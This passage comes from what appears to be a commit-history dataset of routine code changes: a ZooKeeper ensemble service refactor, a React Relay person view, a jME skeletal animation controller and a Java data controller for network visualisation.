(bundleContext, configuration); <add> new Thread(new Runnable() { <add> @Override <add> public void run() { <add> createOnActivate(); <add> activateComponent(); <add> } <add> }).start(); <ide> } <ide> <ide> @Deactivate <ide> deactivateComponent(); <ide> } <ide> <del> void create() { <add> synchronized ComponentState 
getComponentState() { <add> return componentState; <add> } <add> <add> private void createOnActivate() { <ide> org.apache.felix.utils.properties.Properties userProps = null; <del> <ide> try { <ide> userProps = new org.apache.felix.utils.properties.Properties(new File(System.getProperty("karaf.home") + "/etc/users.properties")); <ide> } catch (IOException e) { <ide> } <ide> CreateEnsembleOptions createOpts = CreateEnsembleOptions.builder().fromSystemProperties().users(userProps).build(); <ide> if (createOpts.isEnsembleStart()) { <del> create(createOpts); <del> } <del> } <del> <add> createInternal(createOpts); <add> } <add> } <add> <add> @Override <ide> public void create(CreateEnsembleOptions options) { <add> assertValid(); <add> createInternal(options); <add> } <add> <add> private synchronized void createInternal(CreateEnsembleOptions options) { <ide> try { <ide> int minimumPort = options.getMinimumPort(); <ide> int maximumPort = options.getMaximumPort(); <ide> // Create configuration <ide> updateDataStoreConfig(options.getDataStoreProperties()); <ide> createZooKeeeperServerConfig(zooKeeperServerHost, mappedPort, options); <add> Map<String, String> configuration = getComponentState().getConfiguration(); <ide> registrationHandler.get().addRegistrationCallback(new DataStoreBootstrapTemplate(connectionUrl, configuration, options)); <ide> <ide> // Create the client configuration <ide> } catch (Exception e) { <ide> throw new FabricException("Unable to create zookeeper server configuration", e); <ide> } <del> } <del> <add> } <add> <add> @Override <ide> public void clean() { <del> try { <add> assertValid(); <add> try { <add> BundleContext bundleContext = componentState.getBundleContext(); <ide> Bundle bundleFabricZooKeeper = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-zookeeper", <ide> "mvn:org.fusesource.fabric/fabric-zookeeper/" + FabricConstants.FABRIC_VERSION); <ide> <ide> } <ide> <ide> <del> public void startBundles(CreateEnsembleOptions options) throws BundleException { <add> private void startBundles(CreateEnsembleOptions options) throws BundleException { <ide> // Install or stop the fabric-configadmin bridge <add> BundleContext bundleContext = getComponentState().getBundleContext(); <ide> Bundle bundleFabricAgent = installOrStopBundle(bundleContext, "org.fusesource.fabric.fabric-agent", <ide> "mvn:org.fusesource.fabric/fabric-agent/" + FabricConstants.FABRIC_VERSION); <ide> Bundle bundleFabricConfigAdmin = instalBundle(bundleContext, "org.fusesource.fabric.fabric-configadmin", <ide> return writer.toString(); <ide> } <ide> <del> public static Properties getProperties(CuratorFramework client, String file, Properties defaultValue) throws Exception { <add> private static Properties getProperties(CuratorFramework client, String file, Properties defaultValue) throws Exception { <ide> try { <ide> String v = getStringData(client, file); <ide> if (v != null) {
JavaScript
apache-2.0
89b418a0895472d482d930ec1e99b1ab07a05374
0
grahammendick/navigation,grahammendick/navigation,grahammendick/navigation,grahammendick/navigation,grahammendick/navigation,grahammendick/navigation,grahammendick/navigation
import React from 'react';
import { createFragmentContainer, graphql } from 'react-relay';
import { NavigationBackLink } from 'navigation-react';

var Person = ({ person }) => (
  <div>
    <NavigationBackLink distance={1}>
      Person Search
    </NavigationBackLink>
    <div>
      <h2>{person.name}</h2>
      <div className="label">Date of Birth</div>
      <div>{person.dateOfBirth}</div>
      <div className="label">Email</div>
      <div>{person.email}</div>
      <div className="label">Phone</div>
      <div>{person.phone}</div>
    </div>
  </div>
);

var PersonQuery = graphql`
  query PersonQuery($id: Int!) {
    person(id: $id) {
      ...Person_person
    }
  }
`;

var PersonContainer = createFragmentContainer(Person, {
  person: graphql`
    fragment Person_person on Person {
      name,
      dateOfBirth,
      email,
      phone
    }
  `,
});

export { PersonQuery, PersonContainer };
NavigationReact/sample/relay-modern/src/Person.js
import React from 'react';
import { createFragmentContainer, graphql } from 'react-relay';
import { NavigationBackLink } from 'navigation-react';

var Person = ({ person }) => (
  <div>
    <NavigationBackLink distance={1}>
      Person Search
    </NavigationBackLink>
    <div>
      <h2>{person.name}</h2>
      <div className="label">Date of Birth</div>
      <div>{person.dateOfBirth}</div>
      <div className="label">Email</div>
      <div>{person.email}</div>
      <div className="label">Phone</div>
      <div>{person.phone}</div>
    </div>
  </div>
);

var PersonQuery = graphql`
  query PersonQuery($id: Int!) {
    person(id: $id) {
      ...Person_person
    }
  }
`;
var PersonContainer = createFragmentContainer(Person, {
  person: graphql`
    fragment Person_person on Person {
      name,
      dateOfBirth,
      email,
      phone
    }
  `,
});

export { PersonQuery, PersonContainer };
Tweaked format
NavigationReact/sample/relay-modern/src/Person.js
Tweaked format
<ide><path>avigationReact/sample/relay-modern/src/Person.js <ide> } <ide> } <ide> `; <add> <ide> var PersonContainer = createFragmentContainer(Person, { <ide> person: graphql` <ide> fragment Person_person on Person {
Java
bsd-2-clause
305713f0f4cb24b6b9dd63c00568b00220a01c4b
0
chototsu/MikuMikuStudio,chototsu/MikuMikuStudio,chototsu/MikuMikuStudio,chototsu/MikuMikuStudio
package com.jme.scene.model.ms3d; import com.jme.math.Vector3f; import com.jme.math.Quaternion; import com.jme.math.TransformMatrix; import com.jme.scene.Controller; import com.jme.bounding.BoundingBox; /** * Class to support animations returned from a MilkLoader. * It is important to note that <code>setMinTime</code> and * <code>setMaxTime</code> actually set the begining and ending * keyframe not it's given time. * * @author Jack Lindamood **/ public class MilkAnimation extends Controller{ private Quaternion unSyncbeginAngle=new Quaternion(); private Vector3f unSyncbeginPos=new Vector3f(); private MilkFile movementFile; private TransformMatrix[] jointMovements; private TransformMatrix tempUnSyncd=new TransformMatrix(); private int currentFrame; private float changeAmnt; float timeBetweenFrames; private float skipRate; private float totalSkip; MilkAnimation(MilkFile movementFile, long startTime, long endTime, float duration) { this.movementFile=movementFile; this.timeBetweenFrames=duration; jointMovements=new TransformMatrix[movementFile.nNumJoints]; for (int i=0;i<jointMovements.length;i++) jointMovements[i]=new TransformMatrix(); this.setMaxTime(endTime); this.setMinTime(startTime); this.setSpeed(1); this.setRepeatType(Controller.RT_CYCLE); skipRate=totalSkip=0; } /** * Sets the minimum <I>frame</I> the animation should start at. * If time is less than 0 or greater than maximum frame, call is ignored * @param frame New minimum frame */ public void setMinTime(float frame){ if (frame < 0 || frame > this.getMaxTime() || this.getMinTime()==frame) return; super.setMinTime(frame); currentFrame= (int) frame; } /** * Sets the maximum <I>frame</I> the animation should start at. * If time is more than total animation or greater than minimum frame, call is ignored * @param frame New maximum frame */ public void setMaxTime(float frame){ if (frame <= this.getMinTime() || frame>movementFile.iTotalFrames || this.getMaxTime()==frame) return; super.setMaxTime(frame); currentFrame = (int) this.getMinTime(); } /** * To increase Frames per Second you can specify the amount of time * that should elapse between one update and another for this animation * @param skipRate The new skipRate. The parameter is ignored if it is * larger than the time between frames specified in the ms3d, or less than 0. 
*/ public void setSkipRate(float skipRate){ if (skipRate<0 || skipRate > this.timeBetweenFrames) return; this.skipRate=skipRate; this.totalSkip=0; } /** * Returns skipRate * @return */ public float getSkipRate(){ return this.skipRate; } public void update(float time) { if (!this.isActive()) return; changeAmnt+=time*this.getSpeed(); if (skipRate!=0f){ totalSkip+=time; if (totalSkip >= skipRate) totalSkip=0; else return; } if (changeAmnt>=this.timeBetweenFrames){ changeAmnt=0; currentFrame++; if (currentFrame >= this.getMaxTime()){ if (this.getRepeatType()!=Controller.RT_CLAMP) currentFrame= (int) this.getMinTime(); else this.setActive(false); } } createJointTransforms(changeAmnt); combineWithInverse(); updateData(); } BoundingBox findBiggestFit(int currentGroup){ Vector3f[] extents=new Vector3f[6]; for (int i=0;i<extents.length;i++) extents[i]=new Vector3f(); for (currentFrame=(int) this.getMinTime(); currentFrame<this.getMaxTime();currentFrame++){ for (float changeAmnt=0;changeAmnt<=1;changeAmnt+=.25){ createJointTransforms(changeAmnt); combineWithInverse(); updateBox(extents,currentGroup); } } BoundingBox toReturn=new BoundingBox("Computed Largest Box"); toReturn.computeFromPoints(extents); currentFrame=(int) this.getMinTime(); return toReturn; } private void updateBox(Vector3f[] extents,int currentGroup) { MilkshapeGroup updatingGroup=movementFile.myGroups[currentGroup]; int currentBoneIndex; for (int j=0;j<updatingGroup.numTriangles;j++){ for (int s=0;s<3;s++){ // Each tri has 3 co-ords int coordIndex=movementFile.myTri[ updatingGroup.triangleIndices[j]]. vertexIndices[s]; currentBoneIndex=movementFile.boneID[coordIndex]; if (currentBoneIndex==-1) continue; unSyncbeginPos.set(movementFile.vertexes[coordIndex]); jointMovements[currentBoneIndex].multPoint(unSyncbeginPos); if (unSyncbeginPos.x < extents[0].x) extents[0].set(unSyncbeginPos); if (unSyncbeginPos.x > extents[1].x) extents[1].set(unSyncbeginPos); if (unSyncbeginPos.y < extents[2].y) extents[2].set(unSyncbeginPos); if (unSyncbeginPos.y > extents[3].y) extents[3].set(unSyncbeginPos); if (unSyncbeginPos.z < extents[4].z) extents[4].set(unSyncbeginPos); if (unSyncbeginPos.z > extents[5].z) extents[5].set(unSyncbeginPos); } } } private void combineWithInverse() { for (int i=0;i<jointMovements.length;i++) jointMovements[i].multLocal(movementFile.myJoints[i].inverseChainMatrix,unSyncbeginPos); } private void createJointTransforms(float changeAmnt) { for (int index=0;index<jointMovements.length;index++){ int theParentIndex=movementFile.myJoints[index].parentIndex; unSyncbeginAngle.set(movementFile.myJoints[index].keyframeRot[currentFrame]); unSyncbeginPos.set(movementFile.myJoints[index].keyframePos[currentFrame]); unSyncbeginAngle.slerp(movementFile.myJoints[index].keyframeRot[currentFrame+1],changeAmnt); unSyncbeginPos.interpolate(movementFile.myJoints[index].keyframePos[currentFrame+1],changeAmnt); tempUnSyncd.set(unSyncbeginAngle,unSyncbeginPos); jointMovements[index].set(movementFile.myJoints[index].localRefMatrix); jointMovements[index].multLocal(tempUnSyncd,unSyncbeginPos); if (theParentIndex!=-1){ tempUnSyncd.set(jointMovements[index]); jointMovements[index].set(jointMovements[theParentIndex]); jointMovements[index].multLocal(tempUnSyncd,unSyncbeginPos); } } } private void updateData(){ for (int currentGroup=0;currentGroup<movementFile.nNumGroups;currentGroup++){ MilkshapeGroup updatingGroup=movementFile.myGroups[currentGroup]; int currentBoneIndex; for (int j=0;j<updatingGroup.numTriangles;j++){ for (int s=0;s<3;s++){ // Each 
tri has 3 co-ords int coordIndex=movementFile.myTri[ updatingGroup.triangleIndices[j]]. vertexIndices[s]; currentBoneIndex=movementFile.boneID[coordIndex]; if (currentBoneIndex==-1) continue; unSyncbeginPos.set(movementFile.vertexes[coordIndex]); updatingGroup.setVertex(j*3+s, jointMovements[currentBoneIndex].multPoint(unSyncbeginPos)); unSyncbeginPos.set(movementFile.myTri[updatingGroup.triangleIndices[j]].vertexNormals[s]); updatingGroup.setNormal(j*3+s, jointMovements[currentBoneIndex].multNormal(unSyncbeginPos)); } } } } }
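MilkAnimation.update() above interleaves the frame stepping with the joint math, which can obscure the clock logic. The sketch below isolates just the keyframe stepping (accumulate speed-scaled time, advance a frame per interval, then cycle or clamp); the class, field names, and the boolean cycle flag are illustrative and not part of the jME API.

// Self-contained sketch of the keyframe stepping in MilkAnimation.update():
// accumulate speed-scaled time, advance one frame whenever a full frame
// interval has elapsed, and either wrap to the first frame (cycle) or stop
// updating (clamp) once the last frame is reached.
public class KeyframeClockSketch {

    private final float timeBetweenFrames;
    private final int minFrame;
    private final int maxFrame;
    private final boolean cycle;   // true: wrap around, false: clamp and stop

    private int currentFrame;
    private float changeAmnt;      // blend amount toward the next keyframe
    private boolean active = true;

    public KeyframeClockSketch(float timeBetweenFrames, int minFrame, int maxFrame, boolean cycle) {
        this.timeBetweenFrames = timeBetweenFrames;
        this.minFrame = minFrame;
        this.maxFrame = maxFrame;
        this.cycle = cycle;
        this.currentFrame = minFrame;
    }

    public void update(float time, float speed) {
        if (!active) {
            return;
        }
        changeAmnt += time * speed;
        if (changeAmnt >= timeBetweenFrames) {
            changeAmnt = 0;
            currentFrame++;
            if (currentFrame >= maxFrame) {
                if (cycle) {
                    currentFrame = minFrame;   // loop the animation
                } else {
                    active = false;            // clamp: freeze on the last frame
                }
            }
        }
        // currentFrame and changeAmnt would now drive the slerp/interpolate
        // between keyframe[currentFrame] and keyframe[currentFrame + 1].
    }
}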
src/com/jme/scene/model/ms3d/MilkAnimation.java
package com.jme.scene.model.ms3d; import com.jme.math.Vector3f; import com.jme.math.Quaternion; import com.jme.math.TransformMatrix; import com.jme.scene.Controller; import com.jme.bounding.BoundingBox; /** * Class to support animations returned from a MilkLoader. * It is important to note that <code>setMinTime</code> and * <code>setMaxTime</code> actually set the begining and ending * keyframe not it's given time. * * @author Jack Lindamood **/ public class MilkAnimation extends Controller{ private Quaternion unSyncbeginAngle=new Quaternion(); private Vector3f unSyncbeginPos=new Vector3f(); private MilkFile movementFile; private TransformMatrix[] jointMovements; private TransformMatrix tempUnSyncd=new TransformMatrix(); private int currentFrame; private float changeAmnt; float timeBetweenFrames; private float skipRate; private float totalSkip; MilkAnimation(MilkFile movementFile, long startTime, long endTime, float duration) { this.movementFile=movementFile; this.timeBetweenFrames=duration; jointMovements=new TransformMatrix[movementFile.nNumJoints]; for (int i=0;i<jointMovements.length;i++) jointMovements[i]=new TransformMatrix(); this.setMaxTime(endTime); this.setMinTime(startTime); this.setSpeed(1); this.setRepeatType(Controller.RT_CYCLE); skipRate=totalSkip=0; } /** * Sets the minimum <I>frame</I> the animation should start at. * If time is less than 0 or greater than maximum frame, call is ignored * @param frame New minimum frame */ public void setMinTime(float frame){ if (frame < 0 || frame > this.getMaxTime() || this.getMinTime()==frame) return; super.setMinTime(frame); currentFrame= (int) frame; } /** * Sets the maximum <I>frame</I> the animation should start at. * If time is more than total animation or greater than minimum frame, call is ignored * @param frame New maximum frame */ public void setMaxTime(float frame){ if (frame <= this.getMinTime() || frame>movementFile.iTotalFrames || this.getMaxTime()==frame) return; super.setMaxTime(frame); currentFrame = (int) this.getMinTime(); } /** * To increase Frames per Second you can specify the amount of time * that should elapse between one update and another for this animation * @param skipRate The new skipRate. The parameter is ignored if it is * larger than the time between frames specified in the ms3d, or less than 0. 
*/ public void setSkipRate(float skipRate){ if (skipRate<0 || skipRate > this.timeBetweenFrames) return; this.skipRate=skipRate; this.totalSkip=0; } /** * Returns skipRate * @return */ public float getSkipRate(){ return this.skipRate; } public void update(float time) { if (!this.isActive()) return; changeAmnt+=time*this.getSpeed(); if (skipRate!=0f){ totalSkip+=time; if (totalSkip >= skipRate) totalSkip=0; else return; } if (changeAmnt>=this.timeBetweenFrames){ changeAmnt=0; currentFrame++; if (currentFrame >= this.getMaxTime()){ if (this.getRepeatType()!=Controller.RT_CLAMP) currentFrame= (int) this.getMinTime(); else this.setActive(false); } } createJointTransforms(changeAmnt); combineWithInverse(); updateData(); } BoundingBox findBiggestFit(int currentGroup){ Vector3f[] extents=new Vector3f[6]; for (int i=0;i<extents.length;i++) extents[i]=new Vector3f(); for (currentFrame=(int) this.getMinTime(); currentFrame<this.getMaxTime();currentFrame++){ for (float changeAmnt=0;changeAmnt<=1;changeAmnt+=.25){ createJointTransforms(changeAmnt); combineWithInverse(); updateBox(extents,currentGroup); } } BoundingBox toReturn=new BoundingBox("Computed Largest Box"); toReturn.computeFromPoints(extents); currentFrame=(int) this.getMinTime(); return toReturn; } private void updateBox(Vector3f[] extents,int currentGroup) { MilkshapeGroup updatingGroup=movementFile.myGroups[currentGroup]; int currentBoneIndex; for (int j=0;j<updatingGroup.numTriangles;j++){ for (int s=0;s<3;s++){ // Each tri has 3 co-ords int coordIndex=movementFile.myTri[ updatingGroup.triangleIndices[j]]. vertexIndices[s]; currentBoneIndex=movementFile.boneID[coordIndex]; if (currentBoneIndex==-1) continue; unSyncbeginPos.set(movementFile.vertexes[coordIndex]); jointMovements[currentBoneIndex].multPoint(unSyncbeginPos); if (unSyncbeginPos.x < extents[0].x) extents[0].set(unSyncbeginPos); if (unSyncbeginPos.x > extents[1].x) extents[1].set(unSyncbeginPos); if (unSyncbeginPos.y < extents[2].y) extents[2].set(unSyncbeginPos); if (unSyncbeginPos.y > extents[3].y) extents[3].set(unSyncbeginPos); if (unSyncbeginPos.z < extents[4].z) extents[4].set(unSyncbeginPos); if (unSyncbeginPos.z > extents[5].z) extents[5].set(unSyncbeginPos); } } } private void combineWithInverse() { for (int i=0;i<jointMovements.length;i++) jointMovements[i].multLocal(movementFile.myJoints[i].inverseChainMatrix); } private void createJointTransforms(float changeAmnt) { for (int index=0;index<jointMovements.length;index++){ int theParentIndex=movementFile.myJoints[index].parentIndex; unSyncbeginAngle.set(movementFile.myJoints[index].keyframeRot[currentFrame]); unSyncbeginPos.set(movementFile.myJoints[index].keyframePos[currentFrame]); unSyncbeginAngle.slerp(movementFile.myJoints[index].keyframeRot[currentFrame+1],changeAmnt); unSyncbeginPos.interpolate(movementFile.myJoints[index].keyframePos[currentFrame+1],changeAmnt); tempUnSyncd.set(unSyncbeginAngle,unSyncbeginPos); jointMovements[index].set(movementFile.myJoints[index].localRefMatrix); jointMovements[index].multLocal(tempUnSyncd); if (theParentIndex!=-1){ tempUnSyncd.set(jointMovements[index]); jointMovements[index].set(jointMovements[theParentIndex]); jointMovements[index].multLocal(tempUnSyncd); } } } private void updateData(){ for (int currentGroup=0;currentGroup<movementFile.nNumGroups;currentGroup++){ MilkshapeGroup updatingGroup=movementFile.myGroups[currentGroup]; int currentBoneIndex; for (int j=0;j<updatingGroup.numTriangles;j++){ for (int s=0;s<3;s++){ // Each tri has 3 co-ords int 
coordIndex=movementFile.myTri[ updatingGroup.triangleIndices[j]]. vertexIndices[s]; currentBoneIndex=movementFile.boneID[coordIndex]; if (currentBoneIndex==-1) continue; unSyncbeginPos.set(movementFile.vertexes[coordIndex]); updatingGroup.setVertex(j*3+s, jointMovements[currentBoneIndex].multPoint(unSyncbeginPos)); unSyncbeginPos.set(movementFile.myTri[updatingGroup.triangleIndices[j]].vertexNormals[s]); updatingGroup.setNormal(j*3+s, jointMovements[currentBoneIndex].multNormal(unSyncbeginPos)); } } } } }
TransformMult update git-svn-id: 5afc437a751a4ff2ced778146f5faadda0b504ab@1498 75d07b2b-3a1a-0410-a2c5-0572b91ccdca
src/com/jme/scene/model/ms3d/MilkAnimation.java
TransformMult update
<ide><path>rc/com/jme/scene/model/ms3d/MilkAnimation.java <ide> <ide> private void combineWithInverse() { <ide> for (int i=0;i<jointMovements.length;i++) <del> jointMovements[i].multLocal(movementFile.myJoints[i].inverseChainMatrix); <add> jointMovements[i].multLocal(movementFile.myJoints[i].inverseChainMatrix,unSyncbeginPos); <ide> } <ide> private void createJointTransforms(float changeAmnt) { <ide> for (int index=0;index<jointMovements.length;index++){ <ide> unSyncbeginPos.interpolate(movementFile.myJoints[index].keyframePos[currentFrame+1],changeAmnt); <ide> tempUnSyncd.set(unSyncbeginAngle,unSyncbeginPos); <ide> jointMovements[index].set(movementFile.myJoints[index].localRefMatrix); <del> jointMovements[index].multLocal(tempUnSyncd); <add> jointMovements[index].multLocal(tempUnSyncd,unSyncbeginPos); <ide> if (theParentIndex!=-1){ <ide> tempUnSyncd.set(jointMovements[index]); <ide> jointMovements[index].set(jointMovements[theParentIndex]); <del> jointMovements[index].multLocal(tempUnSyncd); <add> jointMovements[index].multLocal(tempUnSyncd,unSyncbeginPos); <ide> } <ide> } <ide> }
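The change recorded in this commit threads the reusable field unSyncbeginPos into each multLocal call, presumably so the per-joint matrix concatenation can work with one caller-supplied temporary instead of creating its own vector inside the animation loop. Below is a minimal sketch of that scratch-buffer pattern; the Vec3 and Transform types are hypothetical stand-ins, not the real com.jme.math.TransformMatrix API, and the matrix math is reduced to a translation update just to show where the temporary is used.

// Sketch of the allocation-free pattern the diff introduces: the caller passes one
// scratch vector that is reused for every joint, instead of a temporary being created
// per multiply. Types and method names here are illustrative assumptions.
public class ScratchVectorDemo {

    static final class Vec3 {
        float x, y, z;
        void set(float x, float y, float z) { this.x = x; this.y = y; this.z = z; }
    }

    static final class Transform {
        final Vec3 translation = new Vec3();

        // Allocating variant: creates garbage on every call.
        void multLocalAllocating(Transform other) {
            Vec3 tmp = new Vec3();          // new temporary per joint per frame
            combine(other, tmp);
        }

        // Scratch variant: reuses a caller-supplied temporary, the shape of multLocal(other, scratch).
        void multLocal(Transform other, Vec3 scratch) {
            combine(other, scratch);        // no allocation inside the loop
        }

        private void combine(Transform other, Vec3 tmp) {
            // real matrix concatenation omitted; tmp only holds intermediate values
            tmp.set(translation.x + other.translation.x,
                    translation.y + other.translation.y,
                    translation.z + other.translation.z);
            translation.set(tmp.x, tmp.y, tmp.z);
        }
    }

    public static void main(String[] args) {
        Transform[] joints = { new Transform(), new Transform() };
        Transform parent = new Transform();
        Vec3 scratch = new Vec3();          // one shared temporary, as unSyncbeginPos is in the controller
        for (Transform joint : joints) {
            joint.multLocal(parent, scratch);
        }
        System.out.println("done");
    }
}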
Java
mit
25067578563c8858319183c665facc88f9ac8c5e
0
nullbox/Data-and-Information-Visualization-Project
package big.marketing.controller; import java.io.IOException; import java.util.EnumMap; import java.util.List; import java.util.Observable; import org.apache.log4j.Logger; import big.marketing.Settings; import big.marketing.data.DataType; import big.marketing.data.FlowMessage; import big.marketing.data.HealthMessage; import big.marketing.data.IPSMessage; import big.marketing.data.Node; import big.marketing.reader.NetworkReader; import big.marketing.reader.ZipReader; public class DataController extends Observable implements Runnable { // http://docs.oracle.com/javase/7/docs/api/java/util/Observable.html static Logger logger = Logger.getLogger(DataController.class); private GephiController gc; private MongoController mc; // qWindow size in milliseconds, default value 1 hour static int QUERYWINDOW_SIZE = 6000; // qWindow variables store the data returned from mongo private List<HealthMessage> qWindowHealth = null; private List<IPSMessage> qWindowIPS = null; private List<FlowMessage> qWindowFlow = null; private List<Node> network = null; private Node[] highlightedNodes = null; private Node selectedNode = null; private Thread readingThread; public DataController() { loadSettings(); this.mc = MongoController.getInstance(); this.gc = new GephiController(); } public void readData() { readingThread = new Thread(this, "DataReader"); readingThread.start(); } public void run() { // TODO These things would be better to do directly in readers // The readers should independently handle reading and storing to the // database when started from the interface. Every reader should handle // it's own errors NetworkReader nReader = new NetworkReader(this.mc); ZipReader zReader = new ZipReader(this.mc); try { network = nReader.readNetwork(); EnumMap<DataType, Boolean> presentInDatabase = new EnumMap<DataType, Boolean>(DataType.class); for (DataType t : DataType.values()) { presentInDatabase.put(t, mc.isDataInDatabase(t)); } for (int week = 1; week <= 2; week++) { for (DataType t : DataType.values()) { if (!presentInDatabase.get(t)) zReader.read(t, week); } } } catch (IOException err) { logger.error("Error while loading network data.", err); } } /** * Moves QueryWindow to certain position in time and queries data to qWindow * variables from mongo Hides mongo implementation details from views * * @param date in milliseconds marking the center point of the query * @return TODO return some info */ @SuppressWarnings("unchecked") public void moveQueryWindow(int msdate) { int start = msdate - QUERYWINDOW_SIZE / 2, end = msdate + QUERYWINDOW_SIZE / 2; long startTime = System.currentTimeMillis(); qWindowHealth = (List<HealthMessage>) (List<?>) mc.getConstrainedEntries(DataType.HEALTH, "Time", start, end); // qWindowIPS = (List<IPSMessage>) (List<?>) mc.getConstrainedEntries(DataType.IPS, "Time", start, end); // qWindowFlow = (List<FlowMessage>) (List<?>) mc.getConstrainedEntries(DataType.FLOW, "Time", start, end); logger.info("Moved qWindow to " + msdate + ", Query took " + (System.currentTimeMillis() - startTime) + " ms, Window size: " + QUERYWINDOW_SIZE + " ms, Flow: " + qWindowFlow.size() + " objects, Health: " + qWindowHealth.size() + " objects, IPS: " + qWindowIPS.size() + " objects"); // TODO moveQueryWindow should return some info about the success of the database query } private void loadSettings() { try { QUERYWINDOW_SIZE = Integer.valueOf(Settings.get("controller.querywindow.size")); } catch (NumberFormatException err) { logger.error("Loading settings failed, number conversion error", err); } } public 
List<Node> getNetwork() { return network; } public List<HealthMessage> getqWindowHealth() { return qWindowHealth; } public List<IPSMessage> getqWindowIPS() { return qWindowIPS; } public List<FlowMessage> getqWindowFlow() { return qWindowFlow; } public void setHighlightedNodes(Node[] highlightedNodes) { this.highlightedNodes = highlightedNodes; setChanged(); } public void setSelectedNode(Node selectedNode) { this.selectedNode = selectedNode; setChanged(); } public Node[] getHighlightedNodes() { return highlightedNodes; } public Node getSelectedNode() { return selectedNode; } public MongoController getMongoController() { return mc; } public GephiController getGephiController() { return gc; } }
src/big/marketing/controller/DataController.java
package big.marketing.controller; import java.io.IOException; import java.util.EnumMap; import java.util.List; import java.util.Observable; import org.apache.log4j.Logger; import big.marketing.Settings; import big.marketing.data.DataType; import big.marketing.data.FlowMessage; import big.marketing.data.HealthMessage; import big.marketing.data.IPSMessage; import big.marketing.data.Node; import big.marketing.reader.NetworkReader; import big.marketing.reader.ZipReader; public class DataController extends Observable implements Runnable { // http://docs.oracle.com/javase/7/docs/api/java/util/Observable.html static Logger logger = Logger.getLogger(DataController.class); private GephiController gc; private MongoController mc; // qWindow size in milliseconds, default value 1 hour static int QUERYWINDOW_SIZE = 6000; // qWindow variables store the data returned from mongo private List<HealthMessage> qWindowHealth = null; private List<IPSMessage> qWindowIPS = null; private List<FlowMessage> qWindowFlow = null; private List<Node> network = null; private Node[] highlightedNodes = null; private Node selectedNode = null; private Thread readingThread; public DataController() { loadSettings(); this.mc = MongoController.getInstance(); this.gc = new GephiController(); } public void readData() { readingThread = new Thread(this, "DataReader"); readingThread.start(); } public void run() { // TODO These things would be better to do directly in readers // The readers should independently handle reading and storing to the // database when started from the interface. Every reader should handle // it's own errors NetworkReader nReader = new NetworkReader(this.mc); ZipReader zReader = new ZipReader(this.mc); try { network = nReader.readNetwork(); EnumMap<DataType, Boolean> presentInDatabase = new EnumMap<DataType, Boolean>(DataType.class); for (DataType t : DataType.values()) { presentInDatabase.put(t, mc.isDataInDatabase(t)); } for (int week = 1; week <= 2; week++) { for (DataType t : DataType.values()) { if (!presentInDatabase.get(t)) zReader.read(t, week); } } } catch (IOException err) { logger.error("Error while loading network data.", err); } } /** * Moves QueryWindow to certain position in time and queries data to qWindow * variables from mongo Hides mongo implementation details from views * * @param date in milliseconds marking the center point of the query * @return TODO return some info */ @SuppressWarnings("unchecked") public void moveQueryWindow(int msdate) { int start = msdate - QUERYWINDOW_SIZE / 2, end = msdate + QUERYWINDOW_SIZE / 2; long startTime = System.currentTimeMillis(); qWindowHealth = (List<HealthMessage>) (List<?>) mc.getConstrainedEntries(DataType.HEALTH, "Time", start, end); qWindowIPS = (List<IPSMessage>) (List<?>) mc.getConstrainedEntries(DataType.IPS, "Time", start, end); qWindowFlow = (List<FlowMessage>) (List<?>) mc.getConstrainedEntries(DataType.FLOW, "Time", start, end); logger.info("Moved qWindow to " + msdate + ", Query took " + (System.currentTimeMillis() - startTime) + " ms, Window size: " + QUERYWINDOW_SIZE + " ms, Flow: " + qWindowFlow.size() + " objects, Health: " + qWindowHealth.size() + " objects, IPS: " + qWindowIPS.size() + " objects"); // TODO moveQueryWindow should return some info about the success of the // database query } private void loadSettings() { try { QUERYWINDOW_SIZE = Integer.valueOf(Settings.get("controller.querywindow.size")); } catch (NumberFormatException err) { logger.error("Loading settings failed, number conversion error", err); } } public List<Node> 
getNetwork() { return network; } public List<HealthMessage> getqWindowHealth() { return qWindowHealth; } public List<IPSMessage> getqWindowIPS() { return qWindowIPS; } public List<FlowMessage> getqWindowFlow() { return qWindowFlow; } public void setHighlightedNodes(Node[] highlightedNodes) { this.highlightedNodes = highlightedNodes; setChanged(); } public void setSelectedNode(Node selectedNode) { this.selectedNode = selectedNode; setChanged(); } public Node[] getHighlightedNodes() { return highlightedNodes; } public Node getSelectedNode() { return selectedNode; } public MongoController getMongoController() { return mc; } public GephiController getGephiController() { return gc; } }
code cleanup
src/big/marketing/controller/DataController.java
code cleanup
<ide><path>rc/big/marketing/controller/DataController.java <ide> long startTime = System.currentTimeMillis(); <ide> <ide> qWindowHealth = (List<HealthMessage>) (List<?>) mc.getConstrainedEntries(DataType.HEALTH, "Time", start, end); <del> qWindowIPS = (List<IPSMessage>) (List<?>) mc.getConstrainedEntries(DataType.IPS, "Time", start, end); <del> qWindowFlow = (List<FlowMessage>) (List<?>) mc.getConstrainedEntries(DataType.FLOW, "Time", start, end); <add> // qWindowIPS = (List<IPSMessage>) (List<?>) mc.getConstrainedEntries(DataType.IPS, "Time", start, end); <add> // qWindowFlow = (List<FlowMessage>) (List<?>) mc.getConstrainedEntries(DataType.FLOW, "Time", start, end); <ide> <ide> logger.info("Moved qWindow to " + msdate + ", Query took " + (System.currentTimeMillis() - startTime) + " ms, Window size: " <ide> + QUERYWINDOW_SIZE + " ms, Flow: " + qWindowFlow.size() + " objects, Health: " + qWindowHealth.size() + " objects, IPS: " <ide> + qWindowIPS.size() + " objects"); <del> // TODO moveQueryWindow should return some info about the success of the <del> // database query <add> // TODO moveQueryWindow should return some info about the success of the database query <ide> } <ide> <ide> private void loadSettings() {
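This cleanup comments out the IPS and Flow queries while the log statement still reports sizes for all three query windows, so anyone following the pattern needs the unpopulated lists to be handled before calling size() on them. The sketch below shows a null-safe size helper for that kind of timing/log line; the class and helper names are illustrative and not part of the project.

import java.util.Arrays;
import java.util.List;

// Minimal, self-contained sketch: report 0 for a window list that was never populated
// instead of dereferencing a null reference in the log statement.
public class QueryWindowLogDemo {

    // Hypothetical helper, assumed for this sketch.
    static int sizeOrZero(List<?> list) {
        return list == null ? 0 : list.size();
    }

    public static void main(String[] args) {
        List<String> health = Arrays.asList("h1", "h2");
        List<String> flow = null;   // query commented out, list never assigned
        List<String> ips = null;

        long start = System.currentTimeMillis();
        // ... run the one remaining query here ...
        long elapsed = System.currentTimeMillis() - start;

        System.out.println("Moved qWindow, query took " + elapsed + " ms"
                + ", Flow: " + sizeOrZero(flow) + " objects"
                + ", Health: " + sizeOrZero(health) + " objects"
                + ", IPS: " + sizeOrZero(ips) + " objects");
    }
}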
Java
apache-2.0
52f2a9b2a9c2d87d79173735fd01d2c02be4d2f8
0
